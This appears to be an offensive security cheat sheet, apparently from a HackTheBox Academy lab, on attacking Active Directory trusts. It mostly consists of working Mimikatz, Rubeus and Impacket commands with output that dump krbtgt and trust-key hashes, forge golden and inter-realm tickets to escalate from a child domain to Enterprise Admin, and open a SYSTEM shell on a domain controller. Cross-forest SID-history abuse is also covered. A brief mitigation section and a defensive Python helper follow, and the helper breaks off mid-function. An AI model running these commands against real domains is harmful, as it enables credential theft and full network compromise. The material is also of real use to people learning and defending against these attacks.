Trusts

One-way trust (unidirectional): users in the trusted domain can access resources in the trusting domain, but not the reverse
Two-way trust (bidirectional): users of both domains can access resources in the other domain
Transitive: the trust can be extended to establish trust relationships with other domains
Nontransitive: the trust cannot be extended to other domains in the forest
Parent-child trust: yolo.domain.local is a child of domain.local. The trust is always two-way transitive
Tree-root trust: The trust is always two-way transitive
External trust: between two domains in different forests when the forests do not have a trust relationship. Nontransitive
Enumerating Trust Relationships

PS C:\htb> Import-Module activedirectory
PS C:\htb> Get-ADTrust -Filter *
Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=LOGISTICS.INLANEFREIGHT.LOCAL,CN=System,DC=INLANEFREIGHT,DC=LOCAL
ForestTransitive : False
IntraForest : True
IsTreeParent : False
IsTreeRoot : False
Name : LOGISTICS.INLANEFREIGHT.LOCAL
ObjectClass : trustedDomain
ObjectGUID : f48a1169-2e58-42c1-ba32-a6ccb10057ec
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=INLANEFREIGHT,DC=LOCAL
Target : LOGISTICS.INLANEFREIGHT.LOCAL
TGTDelegation : False
TrustAttributes : 32
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False
PowerView
PS C:\htb> Get-DomainTrust
SourceName : INLANEFREIGHT.LOCAL
TargetName : LOGISTICS.INLANEFREIGHT.LOCAL
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/1/2021 6:20:22 PM
WhenChanged : 2/26/2022 11:55:55 PM
SourceName : INLANEFREIGHT.LOCAL
TargetName : FREIGHTLOGISTICS.LOCAL
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : Bidirectional
WhenCreated : 11/1/2021 8:07:09 PM
WhenChanged : 2/27/2022 12:02:39 AM
PS C:\htb> Get-DomainTrustMapping
SourceName : INLANEFREIGHT.LOCAL
TargetName : LOGISTICS.INLANEFREIGHT.LOCAL
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/1/2021 6:20:22 PM
WhenChanged : 2/26/2022 11:55:55 PM
SourceName : INLANEFREIGHT.LOCAL
TargetName : FREIGHTLOGISTICS.LOCAL
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : Bidirectional
WhenCreated : 11/1/2021 8:07:09 PM
WhenChanged : 2/27/2022 12:02:39 AM
SourceName : FREIGHTLOGISTICS.LOCAL
TargetName : INLANEFREIGHT.LOCAL
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : Bidirectional
WhenCreated : 11/1/2021 8:07:08 PM
WhenChanged : 2/27/2022 12:02:41 AM
SourceName : LOGISTICS.INLANEFREIGHT.LOCAL
TargetName : INLANEFREIGHT.LOCAL
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/1/2021 6:20:22 PM
WhenChanged : 2/26/2022 11:55:55 PM
Checking Users in the Child Domain using Get-DomainUser
PS C:\htb> Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
samaccountname
--------------
htb-student_adm
Administrator
Guest
lab_adm
krbtgt
Netdom
C:\htb> netdom query /domain:inlanefreight.local trust
Direction Trusted\Trusting domain Trust type
========= ======================= ==========
<-> LOGISTICS.INLANEFREIGHT.LOCAL
Direct
Not found
<-> FREIGHTLOGISTICS.LOCAL
Direct
Not found
The command completed successfully.
C:\htb> netdom query /domain:inlanefreight.local dc
List of domain controllers with accounts in the domain:
ACADEMY-EA-DC01
The command completed successfully.
C:\htb> netdom query /domain:inlanefreight.local workstation
List of workstations with accounts in the domain:
ACADEMY-EA-MS01
ACADEMY-EA-MX01 ( Workstation or Server )
SQL01 ( Workstation or Server )
ILF-XRG ( Workstation or Server )
MAINLON ( Workstation or Server )
CISERVER ( Workstation or Server )
INDEX-DEV-LON ( Workstation or Server )
...SNIP...
NXC
nxc ldap 192.168.1.48 -u raj -p Password@1 -M enum_trusts

TrustValidator
Validate potential security issues in Active Directory trust relationships
Child -> Parent Trust

Windows - Using Trust Tickets
child.parent.local: child = current domain
parent.local: parent
Look for [In] trust key from child to parent
# Option 1
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName child-dc
# Option 2
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
# Option 3
Invoke-Mimikatz -Command '"lsadump::dcsync /user:child\parent$"'
Forge an inter-realm TGT
# enterprise_admins_group_sid_parent_domain
Get-DomainGroup -Identity "Enterprise Admins" -Domain parent.local | Select-Object SamAccountName, SID
# child_domain_sid = current domain
(Get-Domain).ObjectSID
BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:child.parent.local /sid:<child_domain_sid> /sids:<enterprise_admins_group_sid_parent_domain> /rc4:<In_trust_key> /service:krbtgt /target:parent.local /ticket:C:\path\to\trust_tkt.kirbi" "exit"
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:child.parent.local /sid:<child_domain_sid> /sids:<enterprise_admins_group_sid_parent_domain> /rc4:<In_trust_key> /service:krbtgt /target:parent.local /ticket:C:\path\to\trust_tkt.kirbi"'
Option 1: Abuse with Kekeo
Get a TGS for a service in the target domain
# Old version of kekeo
.\asktgs.exe C:\path\to\trust_tkt.kirbi CIFS/dc.parent.local
# New Version
tgs::ask /tgt:C:\path\to\trust_tkt.kirbi /service:CIFS/dc.parent.local
Tickets for other services (HOST and RPCSS for WMI, HTTP for PowerShell Remoting and WinRM) can also be created
Use the TGS to access the targeted service
# Old version of kekeo
.\kirbikator.exe lsa .\CIFS.dc.parent.local.kirbi
# New version of kekeo
misc::convert lsa TGS_Administrator@child.parent.local_krbtgt~PARENT.LOCAL@CHILD.PARENT.LOCAL.kirbi
ls \\dc.parent.local\c$
Option 2: Abuse with Rubeus
Rubeus.exe asktgs /ticket:C:\path\to\trust_tkt.kirbi /service:cifs/dc.parent.local /dc:dc.parent.local /ptt
ls \\dc.parent.local\c$
Or forge a ticket
Rubeus.exe silver /service:krbtgt/CHILD.PARENT.LOCAL /rc4:<In_trust_key> /sid:<current_domain_sid> /sids:<enterprise_admins_group_sid_parent_domain> /ldap /user:Administrator /nowrap
Use the forged ticket
Rubeus.exe asktgs /service:http/dc.PARENT.LOCAL /dc:dc.PARENT.LOCAL /ptt /ticket:<FORGED TICKET>
Windows - Using krbtgt hash
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:child.parent.local /sid:<child_sid> /sids:<enterprise_admin_sid> /krbtgt:<krbtgt_ntlm_hash> /ptt" "exit"
# Or
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:child.parent.local /sid:<child_sid> /sids:<enterprise_admin_sid> /krbtgt:<krbtgt_ntlm_hash> /ptt"'
Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\krbtgt.kirbi"'
ls \\dc.parent.local\c$
gwmi -class win32_operatingsystem -ComputerName dc.parent.local
Enter-PSSession dc.parent.local
SafetyKatz.exe "lsadump::dcsync /user:parent\krbtgt /domain:parent.local" "exit"
Avoid suspicious logs by using DC group
BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:child.parent.local /sid:<child_sid> /groups:516 /sids:<DC_sid>,s-1-5-9 /krbtgt:<krbtgt_ntlm_hash> /ptt" "exit"
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:child.parent.local /sid:<child_sid> /groups:516 /sids:<DC_sid>,s-1-5-9 /krbtgt:<krbtgt_ntlm_hash> /ptt"'
Or:
BetterSafetyKatz.exe "kerberos::golden /aes256:<krbtgt_aes> /user:child-dc$ /id:1000 /domain:child.parent.local /sid:<child_sid> /sids:<DC_SID>,S-1-5-9 /krbtgt:<krbtgt_ntlm_hash> /ptt" "exit"
Invoke-Mimikatz -Command '"kerberos::golden /aes256:<krbtgt_aes> /user:child-dc$ /id:1000 /domain:child.parent.local /sid:<child_sid> /sids:<DC_SID>,S-1-5-9 /krbtgt:<krbtgt_ntlm_hash> /ptt"'
SafetyKatz.exe "lsadump::dcsync /user:parent\krbtgt /domain:parent.local" "exit"
Invoke-Mimikatz -Command '"lsadump::dcsync /user:parent\krbtgt /domain:parent.local"'
Or use a diamond ticket
Rubeus.exe diamond /krbkey:<krbtgt_aes> /tgtdeleg /enctype:aes /ticketuser:child-dc$ /domain:child.parent.local /dc:dc.child.parent.local /ticketuserid:1000 /sids:<DC_SID>,S-1-5-9 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
SafetyKatz.exe "lsadump::dcsync /user:parent\krbtgt /domain:parent.local" "exit"
Windows - ExtraSids Attack
With Mimikatz
Obtaining KRBTGT NT hash
PS C:\htb> mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
[DC] 'LOGISTICS.INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC02.LOGISTICS.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'LOGISTICS\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/1/2021 11:21:33 AM
Object Security ID : S-1-5-21-2806153819-209893948-922872689-502
Object Relative ID : 502
Credentials:
Hash NTLM: 9d765b482771505cbe97411065964d5f
ntlm- 0: 9d765b482771505cbe97411065964d5f
lm - 0: 69df324191d4a80f0ed100c10f20561e
SID for the child domain - PowerView
PS C:\htb> Get-DomainSID
S-1-5-21-2806153819-209893948-922872689
Enterprise Admins Group SID - PowerView
PS C:\htb> Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
distinguishedname objectsid
----------------- ---------
CN=Enterprise Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL S-1-5-21-3842939050-3880317879-2865463114-519
At this point, we have gathered the following data points:
The KRBTGT hash for the child domain:
9d765b482771505cbe97411065964d5f
The SID for the child domain:
S-1-5-21-2806153819-209893948-922872689
The name of a target user in the child domain (does not need to exist to create our Golden Ticket!): We'll choose a fake user:
hacker
The FQDN of the child domain:
LOGISTICS.INLANEFREIGHT.LOCAL
The SID of the Enterprise Admins group of the root domain:
S-1-5-21-3842939050-3880317879-2865463114-519
Golden Ticket to access all resources within the parent domain
PS C:\htb> mimikatz.exe
mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
User : hacker
Domain : LOGISTICS.INLANEFREIGHT.LOCAL (LOGISTICS)
SID : S-1-5-21-2806153819-209893948-922872689
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-3842939050-3880317879-2865463114-519 ;
ServiceKey: 9d765b482771505cbe97411065964d5f - rc4_hmac_nt
Lifetime : 3/28/2022 7:59:50 PM ; 3/25/2032 7:59:50 PM ; 3/25/2032 7:59:50 PM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'hacker @ LOGISTICS.INLANEFREIGHT.LOCAL' successfully submitted for current session
PS C:\htb> klist
Current LogonId is 0:0xf6462
Cached Tickets: (1)
#0> Client: hacker @ LOGISTICS.INLANEFREIGHT.LOCAL
Server: krbtgt/LOGISTICS.INLANEFREIGHT.LOCAL @ LOGISTICS.INLANEFREIGHT.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 3/28/2022 19:59:50 (local)
End Time: 3/25/2032 19:59:50 (local)
Renew Time: 3/25/2032 19:59:50 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
PS C:\htb> ls \\academy-ea-dc01.inlanefreight.local\c$
Volume in drive \\academy-ea-dc01.inlanefreight.local\c$ has no label.
Volume Serial Number is B8B3-0D72
Directory of \\academy-ea-dc01.inlanefreight.local\c$
09/15/2018 12:19 AM <DIR> PerfLogs
10/06/2021 01:50 PM <DIR> Program Files
09/15/2018 02:06 AM <DIR> Program Files (x86)
11/19/2021 12:17 PM <DIR> Shares
10/06/2021 10:31 AM <DIR> Users
03/21/2022 12:18 PM <DIR> Windows
0 File(s) 0 bytes
With Rubeus
The /rc4 flag is the NT hash for the KRBTGT account
PS C:\htb> .\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.2
[*] Action: Build TGT
[*] Building PAC
[*] Domain : LOGISTICS.INLANEFREIGHT.LOCAL (LOGISTICS)
[*] SID : S-1-5-21-2806153819-209893948-922872689
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ExtraSIDs : S-1-5-21-3842939050-3880317879-2865463114-519
[*] ServiceKey : 9D765B482771505CBE97411065964D5F
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 9D765B482771505CBE97411065964D5F
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : krbtgt
[*] Target : LOGISTICS.INLANEFREIGHT.LOCAL
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'hacker@LOGISTICS.INLANEFREIGHT.LOCAL'
[*] AuthTime : 3/29/2022 10:06:41 AM
[*] StartTime : 3/29/2022 10:06:41 AM
[*] EndTime : 3/29/2022 8:06:41 PM
[*] RenewTill : 4/5/2022 10:06:41 AM
[*] base64(ticket.kirbi):
doIF0zCCBc+gAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoR8bHUxPR0lTVElDUy5JTkxBTkVG
<SNIP >
Q0FMqTIwMKADAgECoSkwJxsGa3JidGd0Gx1MT0dJU1RJQ1MuSU5MQU5FRlJFSUdIVC5MT0NBTA==
[+] Ticket successfully imported!
When dealing with multiple domains, and the target domain differs from the user's domain, specify the domain explicitly so the DCSync operation runs against the right domain controller.
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\lab_adm' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : lab_adm
** SAM ACCOUNT **
SAM Username : lab_adm
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2/27/2022 10:53:21 PM
Object Security ID : S-1-5-21-3842939050-3880317879-2865463114-1001
Object Relative ID : 1001
Credentials:
Hash NTLM: 663715a1a8b957e8e9943cc98ea451b6
ntlm- 0: 663715a1a8b957e8e9943cc98ea451b6
ntlm- 1: 663715a1a8b957e8e9943cc98ea451b6
lm - 0: 6053227db44e996fe16b107d9d1e95a0
Linux - Step by step
KRBTGT Hash
secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt
Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8
krbtgt:aes128-cts-hmac-sha1-96:ca289e175c372cebd18083983f88c03e
krbtgt:des-cbc-md5:fee04c3d026d7538
[*] Cleaning up...
Child domain SID
$ lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation
Password:
[*] Brute forcing SIDs at 172.16.5.240
[*] StringBinding ncacn_np:172.16.5.240[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2806153819-209893948-922872689
500: LOGISTICS\Administrator (SidTypeUser)
501: LOGISTICS\Guest (SidTypeUser)
502: LOGISTICS\krbtgt (SidTypeUser)
512: LOGISTICS\Domain Admins (SidTypeGroup)
513: LOGISTICS\Domain Users (SidTypeGroup)
<SNIP>
$ lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID"
Password:
[*] Domain SID is: S-1-5-21-2806153819-209893948-92287268
Enterprise Admin Group SID
$ lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"
Password:
[*] Domain SID is: S-1-5-21-3842939050-3880317879-2865463114
498: INLANEFREIGHT\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: INLANEFREIGHT\administrator (SidTypeUser)
501: INLANEFREIGHT\guest (SidTypeUser)
502: INLANEFREIGHT\krbtgt (SidTypeUser)
512: INLANEFREIGHT\Domain Admins (SidTypeGroup)
513: INLANEFREIGHT\Domain Users (SidTypeGroup)
514: INLANEFREIGHT\Domain Guests (SidTypeGroup)
515: INLANEFREIGHT\Domain Computers (SidTypeGroup)
516: INLANEFREIGHT\Domain Controllers (SidTypeGroup)
517: INLANEFREIGHT\Cert Publishers (SidTypeAlias)
518: INLANEFREIGHT\Schema Admins (SidTypeGroup)
519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup)
-> S-1-5-21-3842939050-3880317879-2865463114-519
Golden Ticket
$ ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for LOGISTICS.INLANEFREIGHT.LOCAL/hacker
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in hacker.ccache
$ export KRB5CCNAME=hacker.ccache
$ psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5
Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 172.16.5.5.....
[*] Found writable share ADMIN$
[*] Uploading file nkYjGWDZ.exe
[*] Opening SVCManager on 172.16.5.5.....
[*] Creating service eTCU on 172.16.5.5.....
[*] Starting service eTCU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
ACADEMY-EA-DC01
secretsdump LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5
Linux - RaiseChild.py - All in one
$ raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation
Password:
[*] Raising child domain LOGISTICS.INLANEFREIGHT.LOCAL
[*] Forest FQDN is: INLANEFREIGHT.LOCAL
[*] Raising LOGISTICS.INLANEFREIGHT.LOCAL to INLANEFREIGHT.LOCAL
[*] INLANEFREIGHT.LOCAL Enterprise Admin SID is: S-1-5-21-3842939050-3880317879-2865463114-519
[*] Getting credentials for LOGISTICS.INLANEFREIGHT.LOCAL
LOGISTICS.INLANEFREIGHT.LOCAL/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f:::
LOGISTICS.INLANEFREIGHT.LOCAL/krbtgt:aes256-cts-hmac-sha1-96s:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8
[*] Getting credentials for INLANEFREIGHT.LOCAL
INLANEFREIGHT.LOCAL/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:16e26ba33e455a8c338142af8d89ffbc:::
INLANEFREIGHT.LOCAL/krbtgt:aes256-cts-hmac-sha1-96s:69e57bd7e7421c3cfdab757af255d6af07d41b80913281e0c528d31e58e31e6d
[*] Target User account name is administrator
INLANEFREIGHT.LOCAL/administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::
INLANEFREIGHT.LOCAL/administrator:aes256-cts-hmac-sha1-96s:de0aa78a8b9d622d3495315709ac3cb826d97a318ff4fe597da72905015e27b6
[*] Opening PSEXEC shell at ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] Requesting shares on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file BnEGssCE.exe
[*] Opening SVCManager on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Creating service UVNb on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Starting service UVNb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Stopping service UVNb.....
[*] Removing service UVNb.....
[*] Removing file BnEGssCE.exe.....
If you get:
[-] [Errno Connection error (LOGISTICS.INLANEFREIGHT.LOCAL:445)] [Errno -3] Temporary failure in name resolution
add the IP to /etc/hosts. Use -debug to get more info:
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm -debug
Cross-Forest Trust Abuse
Only SIDs with a RID > 1000 are allowed across the trust boundary (SID filtering) - see the SID history section below
Windows - Using Trust Tickets
Trust key for the inter-forest trust
# Option 1
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
# Option 2
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Forge inter-forest TGT
# Child_forest1 to forest2
BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:child.parent_forest1.local /sid:<child_domain_sid> /rc4:<trust_key> /service:krbtgt /target:parent_forest2.local /ticket:C:\path\to\trust_forest_tkt.kirbi" "exit"
# or forest1 to forest1
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:forest1.local /sid:<domain_forest1_sid> /rc4:<trust_key> /service:krbtgt /target:forest2.local /ticket:C:\path\to\sharedwithforest1.kirbi"'
Option 1: Abuse with Kekeo
Get a TGS for a service in the target forest
.\asktgs.exe C:\path\to\trust_forest_tkt.kirbi CIFS/dc.parent_forest2.local
Use the TGS to access the targeted service
.\kirbikator.exe lsa .\CIFS.dc.parent_forest2.local.kirbi
ls \\dc.parent_forest2.local\SharedwithForest1\
Tickets for other services (HOST and RPCSS for WMI, HTTP for PowerShell Remoting and WinRM) can also be created
Option 2: Abuse with Rubeus
Rubeus.exe asktgs /ticket:C:\path\to\trust_forest_tkt.kirbi /service:cifs/dc.parent_forest2.local /dc:dc.parent_forest2.local /ptt
ls \\dc.parent_forest2.local\SharedwithForest1\
or
Rubeus.exe silver /service:krbtgt/CHILD.PARENT.LOCAL /rc4:<trust_key> /sid:<child_domain_sid> /sids:<enterprise_admin_sid> /ldap /user:Administrator /nowrap
Rubeus.exe asktgs /service:http/dc.PARENT.LOCAL /dc:dc.PARENT.LOCAL /ptt /ticket:<FORGED TICKET>
SID history enabled - /enablesidhistory:yes
Enumerate trust
Get-ADTrust -Filter *
If SIDFilteringForestAware is set to True, SIDHistory is enabled across the forest trust.
Get-ADGroup -Identity Forest1Admins -Server targetforest.local
Inject a SIDHistory for RID > 1000 to access resources accessible to that identity or group in the target trusting forest
From Forest1 DC, create a TGT with SIDHistory of Forest1Admins group
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:forest1.local /sid:<forest1_sid> /rc4:<trust_key> /service:krbtgt /target:forest2.local /sids:<enterprise_admin_sid_with_RID_sup_to_1000> /ticket:C:\path\to\ticket.kirbi"'
Request a TGS:
.\asktgs.exe C:\path\to\ticket.kirbi HTTP/web.forest2.local
Inject that into current session:
.\kirbikator.exe lsa HTTP.web.forest2.local.kirbi
Or
Rubeus.exe asktgs /ticket:C:\path\to\ticket.kirbi /service:HTTP/web.forest2.local /dc:dc.forest2.local /ptt
Access the web machine using PSRemoting:
Invoke-Command -ScriptBlock{whoami} -ComputerName web.forest2.local -Authentication NegotiateWithImplicitCredential
Mitigation
The following security controls should be implemented to mitigate a SID History compromise:
Ensure the ‘sIDHistory’ attribute is not used. Unless migrating user objects from one domain to another, the ‘sIDHistory’ attribute should not be required. If no user objects are configured with this attribute, then a SID History compromise is not possible.
Ensure the ‘sIDHistory’ attribute is checked weekly. Malicious actors may add a value to the ‘sIDHistory’ attribute of a user object they control to establish persistence. Regularly checking for this attribute on Active Directory objects may increase detection of this persistence strategy.
Enable SID Filtering for domain and forest trusts. This prevents SIDs of built-in security groups, such as Domain Admins and Enterprise Admins, being used in TGTs across domains. However, malicious actors can still use the SIDs of other security groups if the Relative Identifier is greater than 1000.
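Reading the trust enumeration output above together with the SID filtering rules in this section, as an added example that is not part of the original notes: a small Python triage helper that decodes the raw TrustAttributes value into the names PowerView prints, lists the findings a defender cares about for each trust, and applies the page's simplified SID filtering rules (intra-forest: nothing filtered; quarantine: only the trusted domain's own SIDs; otherwise foreign SIDs need sIDHistory enabled and RID >= 1000) to a set of extra SIDs. The FREIGHTLOGISTICS domain SID and the RID-1105 group SID are constructed placeholders; the other SIDs come from this page.

```python
"""Trust posture triage for Get-ADTrust / PowerView output.

Simplified model of the SID filtering rules stated in this cheat sheet
(intra-forest: nothing filtered; quarantine: only the trusted domain's SIDs;
otherwise foreign SIDs pass only with sIDHistory enabled and RID >= 1000).
It is not the full MS-ADTS filtering table.
"""
from dataclasses import dataclass

# trustAttributes bits (MS-ADTS). Names follow PowerView's output: FILTER_SIDS is
# PowerView's name for QUARANTINED_DOMAIN (Get-ADTrust: SIDFilteringQuarantined);
# TREAT_AS_EXTERNAL is what Get-ADTrust reports as SIDFilteringForestAware.
TRUST_ATTRIBUTES = {
    0x0001: "NON_TRANSITIVE",
    0x0002: "UPLEVEL_ONLY",
    0x0004: "FILTER_SIDS",
    0x0008: "FOREST_TRANSITIVE",
    0x0010: "CROSS_ORGANIZATION",
    0x0020: "WITHIN_FOREST",
    0x0040: "TREAT_AS_EXTERNAL",
    0x0080: "USES_RC4_ENCRYPTION",
    0x0200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x0400: "PIM_TRUST",
    0x0800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}


def decode_trust_attributes(value: int) -> list[str]:
    """Turn the integer trustAttributes value (e.g. 32) into flag names."""
    names = [name for bit, name in sorted(TRUST_ATTRIBUTES.items()) if value & bit]
    unknown = value & ~sum(TRUST_ATTRIBUTES)
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:X}")
    return names


def split_sid(sid: str) -> tuple[str, int]:
    """Split 'S-1-5-21-...-519' into (domain identifier, RID)."""
    prefix, _, rid = sid.rpartition("-")
    return prefix, int(rid)


@dataclass(frozen=True)
class Trust:
    source: str      # trusting domain, where the ticket is presented
    target: str      # trusted domain, where the ticket is issued
    target_sid: str  # domain SID of the trusted domain
    attributes: int  # raw trustAttributes value


def trust_findings(trust: Trust) -> list[str]:
    """Defender-facing observations derived from the attribute bits alone."""
    flags = set(decode_trust_attributes(trust.attributes))
    notes = []
    if "WITHIN_FOREST" in flags:
        notes.append("intra-forest trust: no SID filtering, child compromise is forest compromise")
    if "FOREST_TRANSITIVE" in flags and "TREAT_AS_EXTERNAL" in flags:
        notes.append("sIDHistory enabled on forest trust: foreign SIDs with RID >= 1000 are honoured")
    if not flags & {"WITHIN_FOREST", "FOREST_TRANSITIVE", "FILTER_SIDS"}:
        notes.append("external trust without quarantine: SID filtering disabled")
    if "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION" in flags:
        notes.append("TGT delegation enabled: unconstrained delegation reaches across the trust")
    if "PIM_TRUST" in flags:
        notes.append("PAM/bastion trust: shadow principals map to privileged production groups")
    return notes


def filter_sids(trust: Trust, extra_sids: list[str]) -> tuple[list[str], list[str]]:
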